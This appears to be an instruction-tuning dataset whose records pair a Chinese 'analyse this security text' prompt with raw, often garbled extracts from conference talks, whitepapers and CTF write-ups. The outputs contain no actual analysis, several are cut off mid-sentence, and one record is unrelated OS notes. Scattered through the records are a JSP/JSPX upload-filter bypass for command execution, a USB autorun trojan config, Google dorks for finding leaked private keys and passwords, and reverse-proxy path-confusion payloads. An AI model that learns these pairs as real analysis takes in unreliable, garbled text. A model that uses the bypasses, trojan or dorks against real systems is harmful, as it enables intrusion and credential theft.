{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 次jsp上传绕过的思考 背景 解决案 jsp利EL表达式绕过 jspx利命名空间绕过 jspx利<jsp:expression>绕过 @yzddmr6 前天有个伙伴做项的时候遇到个问题来问我概情况如下 1. jsp的站可以任意件上传 2. 上传jsp会把<%中的<给转义掉 3. 上传jspx会把<jsp:scriptlet>到</jsp:scriptlet>中的内容替换为空 问有什么突破办法 背景 2 当时研究了下后jsp和jspx各给了个解决案发到星球后@hosch3n师傅给了种案tql 其实问题等价于 1. jsp不使<% %>标签如何执命令 2. jspx不使<jsp:scriptlet> </jsp:scriptlet>如何执命令 解决案 3 jsp是默认解析el表达式的并且在没有jsp标签的情况下也可以直接执这样就可以绕过jsp的限制 星球@Gh0stFx也提到了这点 因为jspx实际上是jsp的xml写法所以继承了xml的所有特性例如cdata跟html实体编码等同样也继承 了命名空间的特性 https://www.runoob.com/xml/xml-namespaces.html jsp利EL表达式绕过 jspx利命名空间绕过 4 在<jsp:scriptlet>这个标签中jsp就是默认的命名空间但是实际上可以随意替换成其他名字 这样就绕过了对<jsp:scriptlet>的过滤 在jsp中可以利表达式绕过那么jspx中同样也可以以下是jsp跟jspx语法的对照 jspx利<jsp:expression>绕过 JSP语法 JSP document语法 Page Directive <%@ page %> <jsp:directive.page /> 5 这个法是@hosch3n师傅提出来的把表达式写到jspx中同样可以达到执命令的的 Include Directive <%@ include %> <jsp:directive.include /> Tag Library Directive <%@ taglib %> xmlns:prefix=Library URI Declartion <%!  %> <jsp:declaration>  </jsp:declaration> Scriplet <%  %> <jsp:scriptlet>  </jsp:scriptlet> Expression <%=  %> <jsp:expression>  </jsp:expression> Comment <%--  --%> <!--  -->", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPractical Aerial Hacking & Surveillance Glenn Wilkinson SensePost DefCon 2014 @glennzw Glenn Wilkinson @glennzw SensePost.com @glennzw @glennzw @glennzw Practical Aerial Hacking & Surveillance? @glennzw Hacking? @glennzw Aerial? @glennzw Surveillance? @glennzw Practical? @glennzw Why oh why bring drones into ? @glennzw https://www.youtube.com/watch?v=BlVjdUkrSFY @glennzw Recipe  Aerial Platform  Ground control / automation  Hacking / surveilling equipment  A methodology @glennzw 1. Aerial Platform Barrier to entry Practicality @glennzw 2. Ground Control / Automation @glennzw 3. Equipment @glennzw 4. Methodology @glennzw Its already ground based... @glennzw Retail @glennzw Military @glennzw Text http://dronesurvivalguide.org @glennzw Conference Unique,Devices Number,of, A4endees Device,Per,Person BlackHatVegas,12 4778 6500 0.74 ITWeb,12 1106 400 2.77 44CON,12 969 350 2.77 BlackHatEU,13 681 607 1.12 Securitay,13 375 100 3.75 BSides,13 208 474 0.44 Hackito,13 309 400 0.77 CERT,Poland,13 598 500 1.2 ZeroNights,13 507 600 1.18 BlackHat,Brazil,13 719 ? BlackHat,Asia,14 398 500 0.80 @glennzw glenn@sensepost.com jobs@sensepost.com http://research.sensepost.com/", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFrom One Country - One Floppy to Startup Nation The story of the early days of the Israeli hacking community  PerimeterX 2016 2 Israeli Tech Leaders: Lets see how it all started Hacking Cracking Phreaking Carding 90s Terminology The BBS Scene The BBS Scene The BBS Scene BBS Mischief The Story of the Ethics Group [Ref] The Demo Scene The Virus Scene Virii Israels part of the scene Haifa Jerusalem Search for attribution? [Ref1] Anti Virii List of famous Israeli products Screenshots when possible Personal anecdote: Inbar and the Haifa virus Inbar and Uzi Apple/Yuval Tal VirusBuster [Ref1] Anti Virii Reverse Engineering Tool Evolution Debug -> Turbo Debugger -> Soft-ICE/TRW -> Ollydbg Sourcer -> IDA Pro Contributions Anti Debugging Tricks Cracking Learning to Code Hardware Copy Protection The Story of unasi Music: ftp://modland.ziphoid.com/ pub/modules/Protracker/ Fred%20(FR)/intro1.mod The story of untiny Internet Timeline in Israel So we understand we need to take care of ourselves Edens Story of Fin (Sam) Phreaking Phreaking Calling Cards Friends who were operators No OPSEC whatsoever back then Telephony played DTMF to a token-operated pay phone PBX wardialing Carding CBI & TRW credit verification systems [Ref1] Trade vs. Use The ethical line of proud hackers Youll notice that for this particular category, we dont have anecdotes ;-) Famous Busts Deri Schreibman (1991) First public Israeli case [Ref1] [Ref2] Analyzer (1998, 2008, 2013) Ehud Tennenbaum [Ref1] Michael HaEfrati (2005) The Trojan Horse story [Ref1] Ashkelon Hacker (2017) Convergence Epilogue", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nConfessions(of(a(Professional(Cyber(Stalker( KEN(WESTIN( SR(SECURITY(ANALYST(( KWESTIN@GMAIL.COM(( @KWESTIN( STALKER(REVEALED( D Ken(WesEn(( D Former(ethical(cyber(stalker( D Developed(privacy(invading(tools((for(good)( D Put(bad(people(in(jail( D Trained(law(enforcement(on(invesEgaEve((OSINT)(techniques( D Currently(Sr.(Security(Analyst(at(Tripwire(Inc( D Advisor(for(Spyaware.be(and(Biom.io(( ( ( USB(Hacks( Windows(USB(Trojans( [autorun]( icon=icon.ico( open=passwords.exe( acEon=Install(USB(driver( label=My(Crap( shell\\open\\command=passwords.exe( shell\\open=Install(USB(driver( Windows(Agent(  URL(provided(during(presentaEon( First(iPod(Recovery( Building(Apple(USB(Trojans(  Why(AppleScript?(  Trusted(  Interfaces(for(most(OS(X(apps( (  Tricking(OS(X(with(Homoglyphs((( BiEng(Into(the(AppleScript( ----- tell application \"iTunes\" activate try open location trackURL end try end tell do shell script \" set sysinfo to (system info) as record set uname to long user name of sysinfo set user to short user name of sysinfo set cname to computer name of sysinfo set sip to IPv4 address of sysinfo github.com/kwesEn/applerazor( USB(Aaack(Vector(SEll(a(Threat(  The(Stuxnet(virus(was(iniEally(delivered( via(USB(to(Iranian(nuclear(faciliEes,( eventually(spreading(to(Russian(faciliEes( in(the(same(way.(( (  USB((Malware(has(even(made(it(to(the( InternaEonal(Space(StaEon(((2008( W32.Gammima.AG(worm)(( (  In(2012(two(US(power(plants((ICSDCERT)( were(infiltrated(when(an(employee( inadvertently(brought(an(infected(USB( sEck(onto(the(premises.( The(Trouble(with(IP(as(Evidence(  Requires(work(by(law(enforcement((paperwork)(  Not(idenEty,(does(not(put(person(in(front(of(computer(  Probable(cause(is(a(challenge(  Not(always(accurate((proxies(etc)(  Takes(a(long(Eme(  Other(thei(recovery(companies(use(more(intrusive( methods(( 2009D02D21(23:43:49( When(CorrelaEon(Does(Imply(CausaEon(( Data$Created$By$Us$ Data$Created$For$Us$ Data$Created$About$Us$ BogeyData$ InteracEon(of(Things( DEVICE(ID( SOC", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEricsson's EDACS Trunking http://www.signalharbor.com/ttt/00apr/index.html 1 of 7 6/18/2007 14:07 This article first appeared in the April 2000 issue of Monitoring Times. Ericsson's EDACS Trunking Motorola has several competitors in the trunked public safety radio system marketplace. One popular alternative is the Ericsson/General Electric Enhanced Digital Access Communications System, or EDACS for short. EDACS operates in VHF, UHF, 800, and 900 MHz bands, and is used by private businesses as well as public safety organizations. Second generation trunk-tracking scanners such as the Bearcat 245XLT and PRO-92 as well as publicly available computer software are capable of scanning these systems effectively. Channels Each repeater site in an EDACS system has a dedicated Control Channel that continuously transmits signaling and command information out to the mobile radios. Channel requests and other mobile messages are transmitted to the repeater on this channel as well. Listening to this channel on a normal scanner will result in just a constant buzz of digital information. Each EDACS site, in addition to the Control Channel, may have as many as 23 Working Channels. These channels carry voice and data between mobile radios and dispatch centers. From an operational perspective EDACS systems have better performance should equipment fail or interconnections be lost. If the central controller in a Motorola system fails or cannot communicate with a repeater, the repeater will revert to conventional mode, losing all ability to trunk and forcing users to share frequencies manually. EDACS, on the other hand, goes into a \"failsoft\" mode where trunking cards at each repeater site continue to provide basic trunking features. Another difference between Motorola and EDACS is how channels are assigned. Control messages in a Motorola system use a FCC channel number to indicate the specific radio frequency to use, so listeners can enter those frequencies into trunk-tracking scanners in", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWireless Aerial Surveillance Platform W.A.S.P. DEFCON 19 Who we are. Project Inception - October 2009  Dude, I have an idea  Build a UAV  Provide remote penetration testing capabilities  Useable flight time (~1 hour)  Man portable  Design Philosophy  Low cost  Utilize open source and off-the-shelf components  Focus on system integration not component design  Easily repeatable by anyone Specifications So what is it? Airframe Airframe  FMQ-117B U.S. Army surplus target drone  Foam contruction  ~14 pound take-off weight  E-Flite 90 brushless out runner motor  Castle Creations Phoenix 85HV ESC  17x10electric propeller  2x 6 cell 22.2v 5000mAh LiPo batteries Avionics Avionics  JR Spektrum Dx6i Transmitter and Receiver  2.4GHz  DIY Drones ArduPilot  ArduShield  XY&Z Infrared sensors  Various servos  XBee Pro with AdaFruit adapter  900MHz  Telemetry downlink Payload Payload Payload  Via Epia PX5000eg Pico-ITX motherboard  1 GHz Via C7 CPU  1GB ram  8GB Voyager GTR Flash drive  Backtrack 5  USB 4G dongle  Internet connection  OpenVPN connection to Backend  Session Initiation Protocol (SIP) back haul  XBee Pro module  900MHz  PPP tunnel to Base Station  Universal Serial Radio Peripheral (USRP) Base Station Base Station  Gumstix Overo Earth  ARM Cortex-A8 600Mhz  Chestnut43 add-on module  4.3 touchscreen display  XBee Pro  900MHz  PPP tunnel to the payload  DIY Drones ArduStation  XBee Pro  900MHz  Telemetry down-link from Ardupilot  Asus WL-330gE Wi-Fi Access Point  Allows easy and direct access to payload Backend  Intel P4 3.06GHz HT Processor  4GB Memory  500GB Hard Drive  NVIDIA GTX 470  CUDA Processor  Software  Pyrit  ~19,300 Pairwise Master Keys (PMKs) / second  Asterisk  WPA Brute Force Dictionary  4 GB  354,638,643 Entries  4.5 hours to process entire dictionary against WPA handshake  OpenVPN Server Capabilities Yes, but what does it do? System Topology Base Station Internet VPN to Off-Airframe Processing Backend Systems Capabilities Movie goes here Capabilities  Bas", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Google Drive 上传具编写 有天有找我帮忙写个具被我义正辞的拒绝了我可不帮写具我只是爱学习 这部分内容官档写得很是清楚Google 提供的 APIs 访问是基于 Oauth2.0 认证的其流程可以 致分为以下个步骤 1. 客户端 App 发起认证若户没有登录则需要先登录 2. 弹出授权户点击允许后Google 认证服务器给我们返回个授权码Authorization code 3. 客户端获取到授权码以后授权码向认证服务器请求 Access Token 4. 服务器验证授权码误后返回 Access Token 客户端 5. 拿到 Access Token 以后就可以访问 Google APIs 了其实这还会返回个Refresh token 家直接看下的图可能会较好理解点 上的流程只是基于第次获取 Access Token 的情况因为 Access Token 是有期限的默认是1个 时Access Token 过期之后就需要通过 Refresh Token 来向 Google 认证服务器申请个新的 Access token不需要经历上的1,2,3步 0x00 基本认证 2 Refresh Token 并不是直有效的在下的种情况下将会失效 户撤销了对应程序的授权 该 Refresh Token 已超过 6 个未使 户修改了密码并且 Refresh Token 授权的 Scope 包含了 Gmail 户账号的 Refresh Token 数量已超出最数量 户属于具有有效会话控制策略的 Google Cloud Platform 组织 前每个户账号每个授权凭证有 25 个 Refresh Token 的数量限制如果超过了这个限制当你新建 个 Refresh token 的时候将会使最早创建那个失效般来说我们在经过户授权拿到授权码请 求到 Refresh Token 后必须把它缓存起来以便后续更新 Access Token 因此在实际使时使 Refresh Token 来申请 Access Token 即可 登录 Google访问 https://console.cloud.google.com/cloud-resource-manager?organizationId=0 点击创建项 0x01 Refresh Token 期限      0x02 实操获取 Token 2.1 创建应及 OAuth 客户端 ID 3 项名称可定义创建后进 API 和服务-> OAuth 同意屏幕 4 5 完成之后进凭证创建 OAuth 客户端 ID 应类型选择桌应-> 创建 成功获取到想要的客户端 ID 和 客户端密钥 还有两步差点忘了 6 选择库搜索 Google Drive API-> 启 组装下连接放浏览器中访问 2.2 获取 Authorization code Plain Text 复制代码 https://accounts.google.com/o/oauth2/auth?client_id=[Application Client Id]&redirect_uri=http://localhost&scope=[Scopes]&response_type=code 1 7 由于我这已经登录了账号因此直接点账号即可 8 成功获取 code 关于常的 Scope POST 请求以下内容 2.3 获取 Access Token 和 Refresh Token Scope 描述 https://www.googleapis.com/a uth/drive.file 对应程序创建或打开的件进逐个访问 https://www.googleapis.com/a uth/drive 访问户所有件的完全允许的范围只有在严格需要的情 况下才会申请这个范围 https://www.googleapis.com/a uth/drive.appdata 允许访问 应程序数据件夹 9 成功获取到两个 Token 由于每个 Access Token 有效时间很短因此当 Access Token 过期后服务器需要使 Refresh Token 来获取新的 Access Token  2.4 通过 Refresh Token 获取 Access Token Plain Text 复制代码 https://accounts.google.com/o/oauth2/token httpBody: code={0}&client_id={1}&client_secret={2}&redirect_uri= {3}&grant_type=authorization_code 1 2 3 4 Plain Text 复制代码 https://accounts.google.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCopyright  2010 Trustwave. All Rights Reserved. A Whitepaper for DEF CON 18, July, 2010 This is not the droid you're looking for... Christian Papathanasiou Nicholas J. Percoco June 21st, 2010 Trustwave - 2 - Copyright  2010 Trustwave. All Rights Reserved. A Whitepaper for DEF CON 18, July, 2010 Table of Contents 1 EXECUTIVE SUMMARY............................................................................................ 3 1.1 About the authors.................................................................................................. 4 2 INTRODUCTION TO GOOGLE ANDROID ................................................................. 5 3 MOTIVATIONS BEHIND THIS WORK ...................................................................... 7 4 LINUX KERNEL ROOTKITS...................................................................................... 9 4.1 Hurdles we faced when developing the Android rootkit........................................... 11 4.1.1 Retrieving the sys_call_table address ......................................................... 11 4.1.2 Compiling against the HTC Legend Linux kernel source code........................ 12 4.1.3 Enabling system call debugging ................................................................. 14 5 THE ANDROID ROOTKIT....................................................................................... 18 5.1 sys_read system call hooking ............................................................................... 18 5.2 Hiding from the user and from the OS................................................................... 19 5.3 Implications ........................................................................................................ 20 6 CONCLUSIONS...................................................................................................... 22 7 REFERENCES......................................................................................................... 23 Trustwave - 3 - Copyrigh", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# CyberTank AutoPilot Miscellaneous ## Geo distance (100 points) > CyberTank's autopilot backup system is not responding. Can you respond to the backup system's distance calculation? > > Flag format: CTF{32-hex} A TCP server address was attached. Let's connect to it: ```console root@kali:/media/sf_CTFs/hackazon/CyberTank_AutoPilot# nc portal.hackazon.org 17001 __.---.___ ___/__\\_O_/___\\___ /___ __________ ___\\ |===|\\________/|===| _______|===|__________|===|______ CYBERTANK AutoPilot System [X] We are in Republic of Iceland [X] Current position: (-17.990612, 63.647031) [X] Navigating to: (-16.815328, 64.150291) [?] Distance (km): ``` Looks like we need to provide the distance between two coordinates. These coordinates look like longitude and latitude: ```console root@kali:/media/sf_CTFs/hackazon/CyberTank_AutoPilot# curl -s https://geocode.xyz/63.647031,-17.990612?json=1 | tr ',' '\\n' | grep country \"country\" : \"Iceland\" ``` The country is Iceland like the server claimed. We can use a Python library like `geopy` to calculate the correct distance: ```python from pwn import * import geopy.distance import re def get_coordinates(line): match = re.search(r\"[(]+\\(([)]+), ([)]+)\\)\", line) if match: long = match.group(1) lat = match.group(2) return long, lat raise Exception(\"Can't find coordinates in '{}'\".format(line)) def calculate_distance(lon1, lat1, lon2, lat2): distance = geopy.distance.distance((lon1, lat1), (lon2, lat2)).km return distance r = remote(\"portal.hackazon.org\", 17001) r.recvuntil(\"CYBERTANK AutoPilot System\\n\\n\\t\\n\") while True: line = r.recvline() if \"CTF\" in line: log.success(line) break else: location = line.replace(\"[X] We are in\", \"\") log.info(\"Location: {}\".format(location)) current_position = r.recvline() destination = r.recvline() long1, lat1 = get_coordinates(current_position) log.info(\"Current position: ({}, {})\".format(long1, lat1)) long2, lat2 = get_coordinates(destination) log.info(\"Destination: ({}, {})\".format(long2, lat2)) distance = calc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Google Dorks ## List - inurl:example.com intitle:\"index of\" - inurl:example.com intitle:\"index of /\" \"*key.pem\" - inurl:example.com ext:log - inurl:example.com intitle:\"index of\" ext:sql|xls|xml|json|csv - inurl:example.com \"MYSQL_ROOT_PASSWORD:\" ext:env OR ext:yml -git - inurl:example.com intitle:\"index of\" \"config.db\" - inurl:example.com allintext:\"API_SECRET*\" ext:env | ext:yml - inurl:example.com intext:admin ext:sql inurl:admin - inurl:example.com allintext:username,password filetype:log site:example.com \"-----BEGIN RSA PRIVATE KEY-----\" - inurl:id_rsa - site:codepad.co \"keyword\" - site:scribd.com \"keyword\" - site:npmjs.com \"keyword\" - site:npm-runkit.com \"keyword\" - site:libraries.io \"keyword\" - site:ycombinator.io \"keyword\" - site:coggle.it \"keyword\" - site:papaly.com \"keyword\" - site:google.com \"keyword\" - site:trello.com \"keyword\" - site:prezi.com \"keyword\" - site:jsdelivr.net \"keyword\" - site:codepen.io \"keyword\" - site:codeshare.io \"keyword\" - site:sharecode.io \"keyword\" - site:pastebin.com \"keyword\" - site:repl.it \"keyword\" - site:productforums.google.com \"keyword\" - site:gitter.im \"keyword\" - site:bitbucket.org \"keyword\" - site:*atlassian.net \"keyword\" - inurl:gitlab \"keyword\" - inurl:github \"keyword\"", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nReverse proxies & Inconsistency Aleksei \"GreenDog\" Tiurin About me  Web security fun  Security researcher at Acunetix  Pentester  Co-organizer Defcon Russia 7812  @antyurin \"Reverse proxy\" - Reverse proxy - Load balancer - Cache proxy -  - Back-end/Origin \"Reverse proxy\" URL http://www.site.com/long/path/here.php?query=111#fragment http://www.site.com/long/path;a=1?query=111#fragment + path parameters Parsing GET /long/path/here.php?query=111 HTTP/1.1 GET /long/path/here.php?query=111#fragment HTTP/1.1 GET anything_here HTTP/1.1 GET /index.php[0x..] HTTP/1.1 URL encoding % + two hexadecimal digits a -> %61 A -> %41 . -> %2e / -> %2f Path normalization /long/../path/here -> /path/here /long/./path/here -> /long/path/here /long//path/here -> /long//path/here -> /long/path/here /long/path/here/.. -> /long/path/ -> /long/path/here/.. Inconsistency - web server - language - framework - reverse proxy -  - + various configurations /images/1.jpg/..//../2.jpg -> /2.jpg (Nginx) -> /images/2.jpg (Apache) Reverse proxy - apply rule after preprocessing? /path1/ == /Path1/ == /p%61th1/ - send processed request or initial? /p%61th1/ -> /path1/ Reverse proxy Request - Route to endpoint /app/ - Rewrite path/query - Deny access - Headers modification - ... Response - Cache - Headers modification - Body modification - ... Location(path)-based Server side attacks We can send it: GET //test/../%2e%2e%2f<>.JpG?a1=&?z#/admin/ HTTP/1.1 Host: victim.com Client side attacks <img src=//test/../%2e%2e%2f<>.JpG?a1=&?z#/admin/> GET //..%2f%3C%3E.jpg?a1=%22&?z HTTP/1.1 Host: victim.com - Browser parses, decodes and normalizes. - Differences between browsers - Doesnt normalize %2f (/..%2f -> /..%2f) - <> \" ' - URL-encoded - Multiple ? in query Possible attacks Server-side attacks: - Bypassing restriction (403 for /app/) - Misrouting/Access to other places (/app/..;/another/path/) Client-side attacks: - Misusing features (cache) - Misusing headers modification Nginx - urldecodes/normalizes/applies ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMy name is Yoshinori Takesako. It's very long name. so call me \"Yoshi\". I came from Tokyo, Japan. 1 I am a chairman of the SECCON. SECCON is a largest security CTF contest in Japan. I am an CTF organizer and a challenge creator. I am also on the Open Web Application Security Project - OWASP Japan advisory board. And I am the review board for the CODE BLUE which is a biggest international security conference in Japan. 2 In this year, About 2,500 people took part in the SECCON CTF qualifier from 58 countries around the world. We held the international SECCON CTF Final competition in this year at Tokyo, Japan. Finally, Korean hacker team had won. That was great. 3 I want to show the NIRVANA-KAI SECCON Customized Mk-II. This is a real time visualization system for attack and defense battle of CTF. This real time visualization system was developed by National Institute of Information and Communications Technology - NICT in Japan. 4 Okay, I talk about Backdooring MS Office documents with secret master keys. We made a lot of CTF challenges such as a XSS, reversing, pwn, cryptography at SECCON CTF project. when I created some cryptography challenges, I found this backdoor problem. Microsoft Office twenty ten or later version employ \"Agile Encryption\" algorithm in their OOX documents. We found a vulnerability in the file format specification that can allow an attacker to later decrypt strongly encrypted documents without the password. This is possible by tricking MS Office into creating an undetectable secret master key when it creates encrypted 5 documents. 5 Microsoft has standardized the OOX file format by ECMA international. It is not \"Open Office\" XML format, Open Office is a rival application for Microsoft. So Office Open\" XML format is correct. You can see at the DOCX suffix from filename. And you know it is just a zip archive file. 6 However, when you encrypt a DOCX file, it will become an old classical DOC FILE format. This encrypted.DOCX file has a DOCX suffix. But", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nwww.senseofsecurity.com.au  Sense of Security 2015 Page 1  8 August 2015 Compliance, Protection & Business Confidence Sense of Security Pty Ltd Sydney Level 8, 66 King Street Sydney NSW 2000 Australia Melbourne Level 10, 401 Docklands Drv Docklands VIC 3008 Australia T: 1300 922 923 T: +61 (0) 2 9290 4444 F: +61 (0) 2 9290 4455 info@senseofsecurity.com.au www.senseofsecurity.com.au ABN: 14 098 237 908 Sense of Security VoIP Security Testing Training Fatih Ozavci Christos Archimandritis 8 August 2015 www.senseofsecurity.com.au  Sense of Security 2015 Page 2  8 August 2015 Agenda  Network Infrastructure  VoIP Server Security  Signalling Security  Media Transport Security  Cloud VoIP Solutions Security  VoIP Client Security www.senseofsecurity.com.au  Sense of Security 2015 Page 3  8 August 2015 Introduction www.senseofsecurity.com.au  Sense of Security 2015 Page 4  8 August 2015 Trainers Background  Fatih Ozavci, Principal Security Consultant  Interests  VoIP & *Phreaking  Mobile Applications  Network Infrastructure  Embedded Devices  Hardware and IoT Hacking  Author of Viproy VoIP Penetration Testing Kit  Public Speaker and Trainer  Blackhat, Defcon, HITB, AusCert, Troopers, Ruxcon www.senseofsecurity.com.au  Sense of Security 2015 Page 5  8 August 2015 Trainers Background  Chris Archimandritis  Senior Security Consultant  Interests  VoIP and IMS Infrastructure  Mobile Applications  SAP Environment and Applications Security  Hardware Hacking  Network Infrastructure www.senseofsecurity.com.au  Sense of Security 2015 Page 6  8 August 2015 The Art of VoIP Hacking Test Lab www.senseofsecurity.com.au  Sense of Security 2015 Page 7  8 August 2015 The Art of VoIP Hacking Test Lab www.senseofsecurity.com.au  Sense of Security 2015 Page 8  8 August 2015 Current Threats and Attacker Skills General assumptions:  The VoIP Networks are isolated  Hacking VoIP requires detailed knowledge  Attacks target only privacy and toll fraud  Pretending VoIP services are configured well Real ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Curve12833227 (crypto, 150+37p, 12 solved) In the challenge we get [code](vuln.py) and the [result](flag.enc). What the code does is encrypt the flag using AES and the AES key is encrypted via a custom elliptic curve using generator point `(4,10)`. We don't get the curve equation, only the addition and multiplication functions, but we can easily derive the curve parameters from that. It's very simple to do from the point doubling part: ```python if u == w: m = (3*u*w + 4*u + 1) * i(v+x) ``` Of course since `u==w` then `3*u*w + 4*u + 1 = 3u2 + 4u + 1`. Doubling a point on an elliptic curve requires calculating a tangent to the curve in this point, which means calculating a first derivative. Since `3x2 + 4x + 1` is the derivative we can easily integrate it to get `x3 + 2x2 + x +C` as the curve equation. So we know that `y2 = x3 + 2x2 + x + C`. We also know that point `(4,10)` is on the curve, so we can apply this point to the curve to calculate `C = 100 - (64 + 2*16 + 4) = 0`. So finally the curve is `y2 = x3 + 2x2 + x = x(x2+2x+1) = x(x+1)2` The issue now is that this curve has a singularity in `(-1,0)`. We follow the approach similar to: https://crypto.stackexchange.com/questions/61302/how-to-solve-this-ecdlp And we get the solution code: ```python p = 2128 - 33227 P.<x> = GF(p)[] f = x3 + 2*x2 + x P = (4, 10) Q = (104708042197107879674895393611622483404, 276453155315387771858614408885950682409) f_ = f.subs(x=x-1) print f_.factor() # 340282366920938463463374607431768178228 P_ = (P[0] +1, P[1]) Q_ = (Q[0] +1, Q[1]) t = GF(p)(340282366920938463463374607431768178228).square_root() u = (P_[1] + t*P_[0])/(P_[1] - t*P_[0]) % p v = (Q_[1] + t*Q_[0])/(Q_[1] - t*Q_[0]) % p print v.log(u) ``` Which after a while gives us the discrete logarithm of `35996229751200732572713356533972460509`. With this we can decrypt the flag: ```python k = 35996229751200732572713356533972460509 aes = AES.new(long_to_bytes(k).ljust(16, '\\0'), AES.MODE_CBC, '\\0'*16) flag = \"202bb05919b6f021d22a8b", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Hastad (crypto 400) ###ENG [PL](#pl-version) In the task we get the same unpadded message encrypted via RSA using 3 different public keys, but with the same exponent `e = 3`. This means we can utilize Hastad Broadcast Attack here to recover the message thanks to Chinese Reminder Theorem. The public exponent is 3 in all cases so what we have is in fact: ``` me = y1 mod n1 me = y2 mod n2 me = y3 mod n3 ``` From Chinese Reminder Theorem we know it's possible to recover `me`, and once we have it, we only need to get k-th integer root to get the flag: ```python from src.crypto_commons.generic import long_to_bytes from src.crypto_commons.rsa.rsa_commons import hastad_broadcast def main(): n1 = 95118357989037539883272168746004652872958890562445814301889866663072352421703264985997800660075311645555799745426868343365321502734736006248007902409628540578635925559742217480797487130202747020211452620743021097565113059392504472785227154824117231077844444672393221838192941390309312484066647007469668558141 n2 = 98364165919251246243846667323542318022804234833677924161175733253689581393607346667895298253718184273532268982060905629399628154981918712070241451494491161470827737146176316011843738943427121602324208773653180782732999422869439588198318422451697920640563880777385577064913983202033744281727004289781821019463 n3 = 68827940939353189613090392226898155021742772897822438483545021944215812146809318686510375724064888705296373853398955093076663323001380047857809774866390083434272781362447147441422207967577323769812896038816586757242130224524828935043187315579523412439309138816335569845470021720847405857361000537204746060031 c1 = 64830446708169012766414587327568812421130434817526089146190136796461298592071238930384707543318390292451118980302805512151790248989622269362958718228298427212630272525186478627299999847489018400624400671876697708952447638990802345587381905407236935494271436960764899006430941507608152322588169896193268212007 c2 = 969074907173443465884324916037223126942086603", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 计算机操作系统 - 设备管理 <!-- GFM-TOC --> * [计算机操作系统 - 设备管理](#计算机操作系统---设备管理) * [磁盘结构](#磁盘结构) * [磁盘调度算法](#磁盘调度算法) * [1. 先来先服务](#1-先来先服务) * [2. 最短寻道时间优先](#2-最短寻道时间优先) * [3. 电梯算法](#3-电梯算法) <!-- GFM-TOC --> ## 磁盘结构 - 盘面Platter一个磁盘有多个盘面 - 磁道Track盘面上的圆形带状区域一个盘面可以有多个磁道 - 扇区Track Sector磁道上的一个弧段一个磁道可以有多个扇区它是最小的物理储存单位目前主要有 512 bytes 与 4 K 两种大小 - 磁头Head与盘面非常接近能够将盘面上的磁场转换为电信号读或者将电信号转换为盘面的磁场写 - 制动手臂Actuator arm用于在磁道之间移动磁头 - 主轴Spindle使整个盘面转动 <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/014fbc4d-d873-4a12-b160-867ddaed9807.jpg\"/> </div><br> ## 磁盘调度算法 读写一个磁盘块的时间的影响因素有 - 旋转时间主轴转动盘面使得磁头移动到适当的扇区上 - 寻道时间制动手臂移动使得磁头移动到适当的磁道上 - 实际的数据传输时间 其中寻道时间最长因此磁盘调度的主要目标是使磁盘的平均寻道时间最短 ### 1. 先来先服务 > FCFS, First Come First Served 按照磁盘请求的顺序进行调度 优点是公平和简单缺点也很明显因为未对寻道做任何优化使平均寻道时间可能较长 ### 2. 最短寻道时间优先 > SSTF, Shortest Seek Time First 优先调度与当前磁头所在磁道距离最近的磁道 虽然平均寻道时间比较低但是不够公平如果新到达的磁道请求总是比一个在等待的磁道请求近那么在等待的磁道请求会一直等待下去也就是出现饥饿现象具体来说两端的磁道请求更容易出现饥饿现象 <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/4e2485e4-34bd-4967-9f02-0c093b797aaa.png\"/> </div><br> ### 3. 电梯算法 > SCAN 电梯总是保持一个方向运行直到该方向没有请求为止然后改变运行方向 电梯算法扫描算法和电梯的运行过程类似总是按一个方向来进行磁盘调度直到该方向上没有未完成的磁盘请求然后改变方向 因为考虑了移动方向因此所有的磁盘请求都会被满足解决了 SSTF 的饥饿问题 <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/271ce08f-c124-475f-b490-be44fedc6d2e.png\"/> </div><br>", "category": "text_analysis", "source": "security_papers"}
